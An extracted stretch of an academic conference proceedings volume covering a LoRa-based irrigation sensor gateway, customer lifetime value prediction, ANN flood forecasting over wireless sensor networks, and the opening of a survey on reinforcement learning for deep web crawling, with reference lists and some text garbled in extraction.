in real fields and give data that is updated at high speed capable of reflecting any
changes that occur in the environment of the crops in real time. The proposed real-
time sensing capability and automated drip irrigation are expected to help the farmers
by reducing resource (water and electricity) wastage and optimizing operations by
using drip irrigation to conserve power as well as water.
Fig. 4 a Temperature readings transferred from gateway to Dynamo DB. b Soil moisture readings
graph
6 Conclusion
The research in current work presents several important issues that need to be
considered (a) long-range communication for rural access, (b) cost of equipment
and administration and (c) limit reliance to restrictive frameworks and give local
connection models. The proposed scheme addresses the above mentioned issues.
Directed for little to medium size deployment situations, the stage additionally bene-
fits brisk assignment and customization by outsiders. Processing of the device and
its connection with different cloud platforms has been presented in the paper. Exam-
ples include DropboxTM, FirebaseTM, ThingSpeakTM, freeboardTM, etc. Here,
the low-cost gateway runs on Dynamo DB and a web server to show the received
data in graphs. In result to that the designing of the low-cost LoRa gateway and end
devices is completed with some modification in the libraries as per the chipset used.
The gateway is also tested in various conditions with a DHT11 sensor.
7 Future Work
The creation of an android or IOS application would be extremely beneficial and can
be undertaken for the future research work. This application will enable farmers to
access an app through their mobile phone and access data related to temperature in
the farm, the value of moisture level in the soil and humidity readings. This would
also give the benefit of increased accessibility and mobility to the farmers.
Moreover, while the ISM band in many developed countries is in the 800MHz
range, it is 433MHz in India. Thus, if an all-purpose LoRa module that can operate in
both frequencies can be developed, it would be very useful because it would eliminate
the need for separate codes for the module to transmit over separate frequencies.
270 J. Chauhan et al.
References
1. Patel, P. (2015). Irrigation problems and their solutions in agriculture. International Journal
of Research in all Subjects in Multi Languages [Subject Economics] (IJRSML) 3(2) ISSN:
2321–2853.
2. Atzori, L., Iera, A., & Morabito, G. (20110) The internet of things: A survey., Computer
Network 54(15), 2787–2805; International Journal of Smart Home 10(4) (2016) Copyright ©
2016 SERSC 299; DOI: https://doi.org/10.24897/acn.64.68.187.
3. Perera, C., Liu, C. H., Jayawardena, S., & Chen, M. (2014). A survey on Internet of Things
from industrial market perspective. IEEE Access, 2, 1660–1679. https://doi.org/10.1109/ACC
ESS.2015.2389854
4. Da Xu, L., He, W., & Li, S. (2014). Internet of things in industries: A survey. IEEE Transaction
Industrial Information, 10(4), 2233–2243. https://doi.org/10.1109/TII.2014.2300753
5. Al-Fuqaha, A., Guizani, M., Mohammadi, M., Aledhari, M., & Ayyash, M. (2015). Internet
of things: A survey on enabling technologies, protocols, and applications. Communications
Surveys & Tutorials, IEEE, 17(4), 2347–2376. https://doi.org/10.1109/COMST.2015.2444095
6. Neumann, P., Montavont, J., & Noël, T. (2016). Indoor deployment of low-power wide area
networks (LPWAN): A LoRaWAN case study. In Proceedings of the IEEE 12th International
Conference on Wireless and Mobile Computing, Networking and Communications (WiMob)
(pp. 1–8). https://doi.org/10.1109/WiMOB.2016.7763213.
7. Terrassona, G., Brianda, R., Basrourb, S., & Arrijuriaa, O. (2009). Energy model for the design
of ultra-low power nodes for wireless sensor networks. Procedia Chem 1, 1195–1198; Davcev,
D, Mitreski, K., & Koteli, N. (2018) IoT agriculture system based on LoRaWAN, In 14th IEEE
International Workshop on Factory Communication System (WFCS). https://doi.org/10.1109/
WFCS.2018.8402368.
8. Gunaseelan, J., & Ellappan (2017). IOT agriculture to improve food and farming technology.
In 2017 Conference on Emerging Devices and Smart Systems (ICEDSS). https://doi.org/10.
1109/ICEDSS.2017.8073690.
9. Nandyala, C. S., & Kim, H. K. (2016). Green IoT agriculture and health application. Interna-
tional Journal of Smart Home, 10(4), 289–300. http://dx.doi.org/https://doi.org/10.14257/ijsh.
2016.10.4.26.
10. Hsu, T. C., Yang, H., Chung, Y. C., & Hsu, C. H. (2018). A Creative IOT agriculture platform
for cloud fog computing. Sustainable Computing: Informatics and Systems, 100285. https://
doi.org/10.1016/j.suscom.2018.10.006.
11. Mekala, M. S., & Viswanathan, P. (2017) A survey: Smart agriculture IoT with cloud
computing. In 2017 International Conference on Microelectronic Devices, Circuits and Systems
(ICMDCS). https://doi.org/10.1109/ICMDCS.2017.8211551.
12. Gondchawar, N., & Kawitkar, R. S. (2016). IoT based smart agriculture. International Journal
of Advanced Research in Computer and Communication Engineering, 5(6). https://doi.org/10.
17148/IJARCCE.2016.56188.
13. Vasisht, D., Kapetanovic, Z., Won, J. H., Jin, X., Chandra, R., Kapoor, A., Sinha, S. N., &
Sudarshan, M. (2017). Sean Stratman; FarmBeats: An IoT Platform for Data-Driven Agricul-
ture. In 14th USENIX Symposium on Networked Systems Design and Implementation (NSDI
’17). Boston, MA, USA; ISBN 978-1-931971-37-9. https://www.usenix.org/conference/nsd
i17/technical-sessions/presentation/vasisht.
14. Prathibha, S. R., Hongal, A., & Jyothi, M. P. (2017). IOT based monitoring system in smart
agriculture. https://doi.org/10.1109/ICRAECT.2017.52.
15. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2018). IoT and agriculture data analysis for smart farm. j.compag.
Prediction of Customer Lifetime Value
Using Machine Learning
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 271
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_22
272 K. B. Reddy et al.
a customer is to your association with a boundless time period rather than basically
the primary purchase. This estimation supports in understanding a reasonable cost
for every obtainment.
We are living in a customer-centric market. It is very important to get to know a
customer’s lifetime value (CLV). It helps companies to concentrate their activities
around their most “profitable” customers. The better a company understands CLV, the
better it is to create strategies to retain them. So finding the customer lifetime value
will help the business to concentrate their activities around their most “profitable”
customers.
Machine learning algorithms are implemented in this system. Prediction of
customer lifetime is a regression problem. The dataset contains labeled data. Our
goal is to predict customer lifetime value based on labeled customer transaction
data. Therefore, supervised algorithms are used to train the dataset and predict the
outcome. The model considered for this work is the beta geometric/negative bino-
mial regression model. Knowing earlier whether the customer is valuable or not will
help the product selling-based companies to improve their business around valuable
customers. In this system, lifetimes library (from Python programming) is used as a
tool to predict the customer lifetime value.
2 Literature Review
D. Chen et al. [1] and F. Yoseph et al. [2] utilized the k-implies grouping calculation
and choice tree to enable the business to all more likely comprehend its clients and
accordingly lead client-driven advertising all the more successfully. The holes were
discovered that they did not manage client purchasing behaviors. Crafted by P. P.
Pramono et al. [3] utilized hierarchical K-means, Ward’s method to do bunching
bunch assessment. This investigation moved toward two kinds of CLV segmentation
and this shows that frequency was the main variable in this examination. The hole is
since the division is done dependent on certain factors, the organization can modify
its promoting systems just dependent on client conduct. A. J. Christy et al. [4]’s
client division is finished utilizing recency, frequency, and monetary worth (RFM)
investigation and afterward is reached out to different calculations like K-means
grouping and fuzzy C-means. The working of these methodologies is dissected. The
time taken by every calculation to execute is broken down, and the hole is seen that
the proposed K-means approach devours higher time and builds the number of cycles.
The examinations [6] utilized the two models which are known as the BG/BB model
and BG/NBD model to anticipate the client esteem per item. This examination is said
as opposed to utilizing the RFM to foresee the client lifetime esteem, in the event
that we utilize the RFM/P to anticipate the client lifetime esteem it will give more
exactness.
H. Jia et al. [7] utilized the Bayesian organization model of IBM’s SPSS modeler
device to investigate customer lifetime value related to hazard factors in the Internet
business. The hole is that the arrangement of client hazard is simply established
Prediction of Customer Lifetime Value Using Machine Learning 273
on the assessment of undertaking business needs and past composed works, which
may prompt the avoidance of risk factors. Various straight relapse procedures [8] are
utilized as a conventional information investigative strategy for displaying CLV. Also,
in this examination, a system has been proposed clarifying how the interpersonal
organization data can be incorporated into the information investigative models.
Displaying the client lifetime estimation of the carrier clients is picked as the model
case. The proposed procedure has been applied to the example case and discoveries
have been assessed.
Dahana et al. [9] utilized the inactive class model to accomplish how the way of life
can clarify the heterogeneous client lifetime esteems (CLVs) among different market
sections. In the accompanying examinations, different sorts of clustering methods
[10] are utilized to study to exactly characterize character-based shopper impression
of merchandise with country marks by investigating immense measures of exchange
information. Fluffy clustering model [11, 12] is accustomed to clustering system
group customers. In this investigation, a structure was proposed for bunching system
group clients dependent on viable factors, for example, client lifetime, client type,
client entirety, the nature of being key, and the number of programming items.
ANOVA and regression models [13] are utilized in this investigation to ascertain
client value (CE) and to extend the advertising rate of profitability (ROI) by utilizing
hazard recreation with regard to the travel industry and accommodation. Numerical
models [14] are actualized to locate a sound fit between their client devotion plans
and the overarching idea of steadfastness among clients. The Objective of E. Lee
et at [15] is to propose a stir expectation strategy for improving benefit. In this
investigation, they proposed a beat expectation model for improving benefit involving
two chief advances: (1) picking estimate target and (2) tuning breaking point of the
model. Additionally, by considering this model, the ordinary advantage of the online
game is by suggesting the momentum research techniques and applying it to the live
game that has been in the organization for over nine years to check its sufficiency.
Inclination boost trees are [16] used to introduce a numerical model structure for the
assurance of client lifetime esteem. This examination directed a trial examination
of client CLV dependent on genuine informational indexes. In this investigation, as
opposed to attempting to help a base student straightforwardly, apply a slope boosting
calculation.
This research [17] makes two considerable hypothetical and methodological
commitments. To begin with, the examination results both add to our comprehension
of cordiality client firm connections and give an establishment to future neighborli-
ness advertising and client relationship research. While the idea of client connections
has since a long time ago existed, it has not been concentrated as a multidimensional
development. Cordiality analysts would have been, in general, zero in estimating
explicit components of client connections, e.g., client responsibility or dependability.
Second, the proposed client relationship scale gives a relationship advertising struc-
ture to explore focused on better understanding both the impacts of different show-
casing activities and the monetary degree of profitability from promoting exercises
and ventures. The point of [18] work was to make client lifetime esteem is profoundly
significant to build up a system to quantify the incentive across brands and areas. A
274 K. B. Reddy et al.
logical exploration approach was appointed. This examination produces proof, for
example, “lifetime monetary worth (EVC) contrasts by the gathering and the effect
of its drivers additionally differ.” In [19] research, binomial logistic regression is
utilized to predict customer lifetime value through data mining technique in a direct
selling company.
3 Proposed Framework
4 Results
After perfectly executing our models, we can predict the client lifetime value of each
customer and the below figures will show the same results after executing the model.
From the below figures, we can see the forecast for each customer lifetime value
for the next 30 days. We can also see that the probability of a customer being alive
in the upcoming 30 days (Fig. 2).
From Fig. 3 it is clearly visible that the predicted values are close to the actual
values.
esteem.
1
n
M AE = ( ) |yi − xi | (1)
n i=1
5 Conclusion
evaluation is done to see how the model is predicting when compared to the actual
ones. In this work, it has been clearly demonstrated through the literature review
and introduction, how the customer lifetime value can be helpful to the companies,
for that, the system is developed using the RFM, the score factor was showed the
performance of the model.
References
1. Chen, D., Sain, S. L., & Guo, K. (2012). Data mining for the online retail industry: A case study
of RFM model-based customer segmentation using data mining. Journal Database Marketing
Customer Strategic Management, 19(3), 197–208. https://doi.org/10.1057/dbm.2012.17
2. Yoseph, F., & Heikkila M. (2019). Segmenting retail customers with an enhanced RFM and
a hybrid regression/clustering method. In Processing of International Conference of Machine
Learning Data Engineering. iCMLDE 2018 (Vol. Clv, pp. 77–82). https://doi.org/10.1109/iCM
LDE.2018.00029.
3. Pramono, P. P., Surjandari, I., & Laoh, E. (20190). Estimating customer segmentation based
on customer lifetime value using two-stage clustering method. In 2019 16th International
Conference Services System Services Management ICSSSM 2019. (Vol. 1994, pp. 1–5). https://
doi.org/10.1109/ICSSSM.2019.8887704.
4. Christy, A. J., Umamakeswari, A., Priyatharsini, L., Neyaa, A. (2018). RFM ranking—An
effective approach to customer segmentation. Journal of King Saud Universal—Computer
Information Science. https://doi.org/10.1016/j.jksuci.2018.09.004.
5. Heldt, R., Silveira, C. S., & Luce, F. B. (2019). Predicting customer value per product: From
RFM to RFM/P. Journal Business Resources. https://doi.org/10.1016/j.jbusres.2019.05.001.
6. He, X., & Li, C. (2017). The research and application of customer segmentation on e-commerce
websites. In Proceedings—2016 International Conference Digital Home, ICDH 2016 (pp. 203–
208). https://doi.org/10.1109/ICDH.2016.050.
7. Jia, H. & Li, C. (2019) The research of customer lifetime value related to risk factors in
the internet business. In Proceedings—18th IEEE/ACIS International Conference Computer
Information Science ICIS 2019 (Vol. 1, pp. 105–110). https://doi.org/10.1109/ICIS46139.2019.
8940315.
8. Çavdar, A. B., & Ferhatosmanoğlu, N. (2018). Airline customer lifetime value estimation using
data analytics supported by social network information. Journal of Air Transport Management,
67, 19–33. https://doi.org/10.1016/j.jairtraman.2017.10.007
9. Dahana, W. D., Miwa, Y., & Morisada, M. (2019). Linking lifestyle to customer lifetime value:
An exploratory study in an online fashion retail market. Journal of Business Resource, 99,
319–331. https://doi.org/10.1016/j.jbusres.2019.02.049
10. Chiang, L. L., & Yang, C. S. (2018). Does country-of-origin brand personality generate retail
customer lifetime value? A big data analytics approach. Technology Forecasting Social Change,
130, 177–187. https://doi.org/10.1016/j.techfore.2017.06.034
11. Hasanpour, Y., Nemati, S., & Tavoli, R. (2018). Clustering system group customers through
fuzzy C-Means clustering. In Proceedings—2018 4th Iranian Conference Signal Processing
Intelligence System ICSPIS 2018. (pp. 161–165). https://doi.org/10.1109/ICSPIS.2018.870
0548.
12. Monalisa, S., Nadya, P., & Novita, R. (2019). Analysis for customer lifetime value categoriza-
tion with RFM model. Procedia Computer Science, 161, 834–840. https://doi.org/10.1016/j.
procs.2019.11.190
13. Kim, Y. P., Boo, S., & Qu, H. (2018). Calculating tourists’ customer equity and maximizing the
hotel’s ROI. Tourism Management, 69(March), 408–421. https://doi.org/10.1016/j.tourman.
2018.05.001
278 K. B. Reddy et al.
14. Srivastava, M., & Rai, A. K. (2018). Mechanics of engendering customer loyalty: A conceptual
framework. IIMB Management Review, 30(3), 207–218. https://doi.org/10.1016/j.iimb.2018.
05.002
15. Lee, E., Kim, B., Kang, S., Kang, B., Jang, Y., & Kim, H. K. (2018). Profit optimizing churn
prediction for long-term loyal customers in online games. IEEE Transaction Games, 12(1),
41–53. https://doi.org/10.1109/tg.2018.2871215
16. Singh, L., Kaur, N., & Chetty, G. (2018) Customer life time value model framework using
gradient boost trees with RANSAC response regularization. In Proceeding International Jt.
Conference Neural Networks (Vol. 2018-July, pp. 1–8). https://doi.org/10.1109/IJCNN.2018.
8489710.
17. Hyun, S. S., & Perdue, R. R. (2017). Understanding the dimensions of customer relationships
in the hotel and restaurant industries. International Journal of Hospitality Management, 64,
73–84. https://doi.org/10.1016/j.ijhm.2017.03.002
18. Baidya, M. K., Maity, B., Ghose, K. (2019). Innovation in marketing strategy: A customer
lifetime value approach 25, 25–41. https://doi.org/10.6347/JBM.201909.
19. Mauricio, A. P., Payawal, J. M. M., Dela Cueva, M. A., & Quevedo, V. C. (2016) Predicting
customer lifetime value through data mining technique in a direct selling company. In 2016
International Conference Industrial Engineering Management Science Application (pp. 1–5).
https://doi.org/10.1109/ICIMSA.2016.7504027.
An Intelligent Flood Forecasting System
Using Artificial Neural Network in WSN
Abstract The flood forecasting system is widely used in the hydrological research,
and neural network has provided considerable assistance in the prediction of the
flood. The flood alert system enhances by mitigating the damage and public safety.
The proposed model is an intelligent flood alerting system using the neural network
for a wireless sensor network (WSN). The neural network model is composed of past
rainfall measurements with rainfall in diverse duration and flow of water. Various
environmental factors are considered, while training the proposed model and the
significant insights are framed. This paper incorporates the fuzzy and sigmoid func-
tion for the identification runoff rainfall process. The proposed model is investigated
by comparing the parameters end to end delay, packet loss, and throughput. From
the observation and comparison of results, the proposed model has the best outcome.
The simulation analysis is compared with the existing approach and obtained an
effective prediction.
Keywords Neural network · Flood forecasting · Water level · Packet loss · And
throughput
1 Introduction
The main intent of flood prediction is minimizing the impact of economic factors and
the risk of human lives [1–3]. An effective flood alert system assists the collection
of data, analysis of collected data, monitoring the scenario of rainfall, and warning
the people about the flood with the increased water level. Wireless sensor nodes
and wireless sensor networks play a prominent role in the entire process of flood
prediction [4]. The nodes in the sites will gather the data about the atmospheric
K. S. R. Kumar
Department of CSE, RYM EC, Ballari, Karnataka, India
R. V. Biradar (B)
Department of CSE, BITM, Ballari, Karnataka, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 279
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_23
280 K. S. R. Kumar and R. V. Biradar
2 Related Work
The disaster caused in Southeast Asia results in great loss of economic damage and
the life of living beings. The international agencies and government have formu-
lated the disaster response methods are developed with the remote sensing data that
monitors the environment temporarily and spatially [15]. The normalized difference
vegetation index is applied to train the water classifier that is used to the interest of
the time. The operational flood identification component is generated that performs
An Intelligent Flood Forecasting System Using … 281
the composition of the image. The radar-based observation of historic rainfall event
and assessment accuracy is presented. The decision support approach has provided
a supportive tool and needed information to the developing organization.
The operational risk in the flood is managed by the global flood partnership, and
the result is used to monitor and predict the flood event [16]. The developed approach
reduced the impact of the disaster and maintained emergency operations effectively.
The flood prediction model developed using a wireless sensor network [17] predict
the occurrence of flood in the river that is fast and simple. The proposed approach
has saved the people by predicting the flood effectively.
The linear regression approach is incorporated with WSN and uses multiple vari-
ables. The approach is reliable and independent of parameters where the approach is
desirable for any real-time scenario. The approach is effective for several situations
and has some limitations in the performance, namely ineffective and inaccuracy. In
certain countries, rainfall and typhoons are more general where the intensified and
prolonged rainfall causes flood [18].
A predictive model is developed to predict the status of rainfall and flood. From
the rain gauge, rainfall data is collected using the sensors and microcontrollers. The
data is further used in the analyses, and it gives the advisories as well as a warning to
the relevant person. Environmental factors like rainfall amount, temperature, water
level, and humidity. The information from the sensor nodes helps in the prediction
of flood and water levels [19].
Flood is a recurrent disaster across the world that happens due to excess flow of
water, specifically in low-lying spaces. The excellence of water adopts the lifespan
of existing belongings on the earth. The proposed system defines the deployment and
design of real-time water and flood quality observing system with a fast and simple
estimation that provides effective regulator measures [20].
The main approach of the steamflood and waterflood tracking system (SWATS)
[21] is permitting the incessant observing system for the steamflood and water-
flood systems with granularity attention, short delay, and low cost while giving high
reliability and effective accuracy. The identification and anomaly recognition is a
challenging scheme because of the intrinsic unreliability and inaccuracy of sensors
that are transitory with the characteristics of the water flows. The inefficiency and
inaccuracy in the existing approach are rectified using the artificial neural network,
and it is discussed in Sect. 3.
approach is illustrated in Figure. The overall testing and training of rainfall data
using a neural network for forecasting the rainfall are displayed in Fig. 1.
The process of runoff of rainfall is modeled via a neural network with the level
of water at a(t + l) as the target value is identified, and it has one hidden layer.
The water level of past rainfall is taken as input, and it is associated with the m, n
available gauges of rain rf1 , rf2 , …, rfn , and the time lag is signified as tl1 , tl2 , …, tln .
The time utilized by the rainwater to join the river is considered with time lags, and
every input gauge point is with equal order q. The rainfall measures with exogenous
variable is given as, rf1 (t − tl1 ), rf1 (t − tl1 − 1), …, rf1 (t − tl1 − q + 1, …, rfn (t −
tln ), …, rfn (t − tln − q + 1), and the input for overall network input is (a + n * q)
variables. The vector v is composed of all the input variables.
Within the developed network, the hidden layer sums the input value at the kth
node, and it is equated as follows,
j=a+n∗q
Xk = w jk vi − bk (1)
j=0
where the weight wjk is assigned for input vj at the kth node and the neuron bias is
bk . The signal rate X k turned as an argument of the activate function at the neuron.
An Intelligent Flood Forecasting System Using … 283
Table 1 Assignment of
Data collection High Medium Low
threshold value
Humidity >40% 20–40% <20%
Water Level >72% 30–72% <30%
Vibration >150 mH 50–150 mH <50 mH
Temperature >34 °C 15–34 °C <15 °C
2
Ck = f (X k ) = 1 − (2)
exp 2X j + 1
The outputs of ck in the hidden layer neuron are then transmitted to the output
layer, and it has a linear node with unique data which weights the values of ck by
W k . This will return the value for the forecast
a(t + l) = Wk Ck − bot (3)
k
where bot denotes the bias value correlated with the neuron and the network value is
organized as a direct forecaster. This value returns the l steps ahead prediction evade
the intermediary forecast system necessitated by the recursive system that may give
an error value with propagation rate. In the context of mild supposition, a direct
identifier is illustrated to give the best performance than the recursive approach. The
threshold value assignment and the forecasting are given in Tables 1 and 2.
The data is collected from diverse sensor nodes and processed with the help
of WSN approach. The dataset is trained using neural network, and the activation
function is applied acquire the decision from the testing data. The overall performance
of the algorithm is illustrated in Fig. 2.
Our proposed flood forecasting system is simulated using network simulator (NS2),
and the experiment is implemented with the help of MATLAB. Network parameters,
namely delay, packet loss, and throughput are compared, whereas the size of the
packet is constant that is transmitted at the interval of 1 s. The hidden layer of
the network is kept static with 12 neurons at one layer. The resultant value of the
simulation is given in Tables 3, 4, and 5.
Throughput is the actual quantity of data sent or received successfully over the
communication link. Throughput is measured as bps, and it is diverse from the band-
width. It is the total unit of information measure that can process in a given amount
of time. The topology with higher throughput is the best topology with effective
performance. From Table 3, the proposed topology has the highest throughput, and
it is illustrated in Fig. 3.
Packet loss is the rate of data loss during the data transmission across the commu-
nication channel, and it is caused by an error in the network, congestion in the
network, data flooding, and breakage of links in the network. The topology with a
minimum percentage of packet loss is considered as the best topology, and the simu-
lation analysis is given in Table 4. From the results, it is identified that the proposed
model has the best result, and it is illustrated in Fig. 4 (Fig. 5).
Table 3 Comparison of
Number of nodes Topology
throughput and number of
nodes Star Mesh Proposed model
125 150 155 160
175 140 145 155
220 130 135 150
275 135 140 145
325 120 130 140
375 115 125 135
425 100 110 125
Table 4 Comparison of
Pause time (s) Topology
packet loss and pause time
Star Mesh Proposed model
50 20 18 15
100 34 31 29
150 42 39 37
200 56 51 49
250 58 53 51
300 60 59 58
350 63 60 59
286 K. S. R. Kumar and R. V. Biradar
THROUGHPUT VS NODES
Star Mesh Proposed Model
200
THROUGHPUT IN BPS
150
100
50
0
1 25 1 75 2 20 275 3 25 3 75 4 25
NUMBER OF NODES
60
50
40
30
20
10
0
50 100 1 50 2 00 2 50 3 00 350
From the observation of results and comparison with various parameters, the
proposed approach attained the best result. The flood detection process is highly
effective with the proposed ANN model.
The proposed model is trained with a backpropagation approach, and it uses the
sigmoid activation function with the learning rate 0.8 and error rate 10–3 . The root
mean square error (RMSE) for training and checking error for different iteration is
given in Table 6.
The root mean square error (RMSE) for training and checking error for different
iteration is given in Figs. 6 and 7. The occurrence of training and checking error in
the proposed approach is minimum, and hence, the accuracy is enriched.
5 Conclusion
An intelligent flood alerting system is developed using the neural network for the
wireless sensor network (WSN). The sensor nodes scattered across the network
utilizes a very low power network, which collects the data like rainfall, rate of rainfall
for every month, humidity, and speed of air in the atmosphere. Various environmental
factors are considered, while training the proposed model and the significant insights
are framed. The proposed model is tested by considering the parameters like an end to
end delay, packet loss, and throughput. From the observation of results, the proposed
288 K. S. R. Kumar and R. V. Biradar
Training Error
0.3
0.25
0.2
0.15
0.1
0.05
0
50 100 150 200
NUMBER OF EPOCHS
Training Error
Checking Error
0.62
0.61
0.6
0.59
0.58
0.57
0.56
0.55
50 100 150 200
NUMBER OF EPOCHS
Checking Error
model has the best outcome. The flood alert system is framed with the assistance of
threshold assignment, whereas the prediction of the result is effective with promising
simulation analysis. The simulation parameter of the proposed scheme is investigated
by comparing it with the existing star and mesh topology. The proposed approach
attained the best outcome. In the future, the proposed approach is used to predict the
flood in various locations.
References
1. Ragnoli, M., Barile, G., Leoni, A., Ferri, G., & Stornelli, V. (2020). An autonomous low-power
LoRa-based flood-monitoring system. Journal of Low Power Electronics and Applications,
10(2), 15.
An Intelligent Flood Forecasting System Using … 289
2. Shamsi, S. (2019). Flood forecasting review using wireless sensor network. Global Sci-Tech,
11(1), 13–22.
3. Patil, P. S., & Jain, S. S. Survey on flood monitoring & alerting systems.
4. Dwivedi, R. K., Kumari, N., & Kumar, R. (2020). Integration of wireless sensor networks with
cloud towards efficient management in IoT: A review. In Advances in data and information
sciences (pp. 97–107). Springer.
5. Ullah, T. F., Gnana Prakasi O. S., & Kanmani, P. (2020). A review on flood prediction algorithms
and a deep neural network model for estimation of flood occurrence. International Research
Journal of Multidisciplinary Technovation, 2(5), 8–14.
6. Sakib, S. N., Ane, T., Matin, N., & Kaiser, M. S. (2016). An intelligent flood monitoring
system for Bangladesh using wireless sensor network. In 2016 5th International Conference
on Informatics, Electronics and Vision (ICIEV) (pp. 979–984). IEEE.
7. Aziz, N. A. A., & Aziz, K. A. (2011, February). Managing disaster with wireless
sensor networks. In 13th International Conference on Advanced Communication Technology
(ICACT2011) (pp. 202–207). IEEE.
8. Pant, D., Verma, S., & Dhuliya, P. (2017, September). A study on disaster detection and manage-
ment using WSN in Himalayan region of Uttarakhand. In 2017 3rd International Conference
on Advances in Computing, Communication and Automation (ICACCA)(Fall) (pp. 1–6). IEEE.
9. Singh, V. P., Jain, S., & Singhai, J. (2010). Hello flood attack and its countermeasures in wireless
sensor networks. International Journal of Computer Science Issues (IJCSI), 7(3), 23.
10. Lee, J. U., Kim, J. E., Kim, D., Chong, P. K., Kim, J., & Jang, P. (2008, September). RFMS: Real-
time flood monitoring system with wireless sensor networks. In 2008 5th IEEE International
Conference on Mobile Ad Hoc and Sensor Systems (pp. 527–528). IEEE.
11. Hughes, D., Greenwood, P., Blair, G., Coulson, G., Grace, P., Pappenberger, F., … Beven,
K. (2008). An experiment with reflective middleware to support grid-based flood monitoring.
Concurrency and Computation: Practice and Experience, 20(11), 1303–1316.
12. Roy, J. K., Gupta, D., & Goswami, S. (2012, December). An improved flood warning system
using WSN and Artificial Neural Network. In 2012 Annual IEEE India Conference (INDICON)
(pp. 770–774). IEEE.
13. Castillo-Effer, M., Quintela, D. H., Moreno, W., Jordan, R., & Westhoff, W. (2004, November).
Wireless sensor networks for flash-flood alerting. In Proceedings of the Fifth IEEE International
Caracas Conference on Devices, Circuits and Systems, 2004 (Vol. 1, pp. 142–146). IEEE.
14. Merkuryeva, G., Merkuryev, Y., Sokolov, B. V., Potryasaev, S., Zelentsov, V. A., & Lektauers, A.
(2015). Advanced river flood monitoring, modelling and forecasting. Journal of Computational
Science, 10, 77–85.
15. Ahamed, A., & Bolten, J. D. (2017). A MODIS-based automated flood monitoring system for
southeast Asia. International Journal of Applied Earth Observation and Geoinformation, 61,
104–117.
16. Alfieri, L., Cohen, S., Galantowicz, J., Schumann, G. J., Trigg, M. A., Zsoter, E., …, Rudari,
R. (2018). A global network for operational flood risk reduction. Environmental Science and
policy, 84, 149–158.
17. Seal, V., Raha, A., Maity, S., Mitra, S. K., Mukherjee, A., & Naskar, M. K. (2012). A simple
flood forecasting scheme using wireless sensor networks. arXiv preprint arXiv:1203.2511.
18. Panganiban, E. B., & Cruz, J. C. D. (2017, November). Rain water level information with
flood warning system using flat clustering predictive technique. In TENCON 2017–2017 IEEE
Region 10 Conference (pp. 727–732). IEEE.
19. Udo, E. N., & Isong, E. B. (2013). Flood monitoring and detection system using wireless sensor
network. Asian Journal of Computer and Information Systems, 1(04).
20. Jegadeesan, S., Dhamodaran, M., & Sri Shanmugapriya, S. (2018). Wireless sensor network
based flood and water quality monitoring system using IoT. Taga Journal of Graphic
Technology, Online ISSN (1748-0345).
21. Yoon, S., Ye, W., Heidemann, J., Littlefield, B., & Shahabi, C. (2011). SWATS: Wireless sensor
networks for steamflood and waterflood pipeline monitoring. IEEE Network, 25(1), 50–56.
Reinforcement Learning in Deep Web
Crawling: Survey
Abstract Context: Reinforcement learning (RL) can help in solving various chal-
lenges of deep web crawling. Deep web content can be accessed by filling the search
forms rather than hyperlinks. Understanding the search form and proper selection
of queries are necessary steps to retrieve the deep web content successfully. Thus,
crawling the deep web is a very challenging task. The reinforcement learning-based
technique helps in filling the search form and retrieving the deep web content success-
fully. RL selects the action based on the given state, and the environment assigns
reward/penalty to the selected action. Objective: This study reports a survey of RL-
based techniques applied in the domain of deep web crawling. Method: Existing liter-
ature survey is based on 31 articles from 77 articles published in various reputed jour-
nals, conferences, and workshops. Results: Challenges related to various crawling
steps of deep web crawling are presented. RL-based techniques are being used in
multiple research papers, which solves deep web crawling challenges. Comparative
analysis of RL techniques used in deep web crawling is done based on the strength,
metrics, dataset, and research gaps. Conclusion: Various RL-based techniques can
be applied to deep web crawling, which has not been explored yet. Open challenges
and research directions are also recommended.
Keywords Reinforcement learning · Deep web · Ranked deep web · Query · Form
discovery · Query selection · Information Retrieval
1 Introduction
The World Wide Web is a collection of documents that are connected by hyperlinks.
This collection is called the surface web, which is being crawled by various standard
search engines. The part of web which is not accessed by hyperlinks but accessed
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 291
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_24
292 K. Madan and R. Bhatia
through search forms is called the deep web or hidden web. Bergman coined the
term deep web in 2001 and estimated the size of the deep web, which is 7500
terabytes compared to 19 terabytes of surface web [1]. 95% of deep web content is
freely available in the public domain. The importance of deep web content can’t be
ignored because it also contains high-quality information as compared to the surface
web. A deep web crawler finds the search forms, identifies their labels, fills them
with the relevant keywords, submits the form, and crawls the relevant region. Deep
web crawling (DWC) consists of five steps [2]: First is automated deep web entry
point discovery, second is form modeling, third is query selection, fourth is form
submission, and fifth is crawling paths learning. Various researchers have proposed
different methods to explore the deep web [3, 4]. In DWC, a user enters the query in the
search form, and then, all matched documents are returned. Whereas in ranked DWC,
a particular query is entered in the search form, and then only k matched documents
are returned. Designing a crawler that explored the deep web and ranked deep web
is challenging. Reinforcement learning (RL) has gained tremendous popularity in
the industry and academic domain due to its self-learning characteristics [5]. Various
techniques based on RL are used in deep web to solve these challenges, as discussed
in Section 3. Different survey papers of DWC techniques were analyzed [6–10]. None
of the survey papers have been published wherein detailed RL-based techniques in
DWC have been discussed. These survey papers cover only one or two research
papers related to RL in the context of DWC. This motivates us to explore the DWC
survey based on RL. To do this survey, the following search string has been prepared
that has value—‘reinforcement learning’ technique in ‘deep web crawling.’ This
search string was executed on the Google scholar website that returns 77 results
[11]. Irrelevant research papers were discarded based on manual inspection of title,
followed by an abstract and full text read in three steps. Figure 1 shows the survey
selection criteria for picking the research papers. Step 1 is based on the title of a
research paper, and the count is reduced to 70. In step 2, the exclusion is done on
• Title based
exclusion #70
(Step 1)
• Abstract
based
exclusion #55
(Step 2)
• Full text
based
exclusion #31
(Step 3)
Reinforcement Learning in Deep Web Crawling: Survey 293
the basis of the abstract. Now, the research paper count is decreased to 55. In step
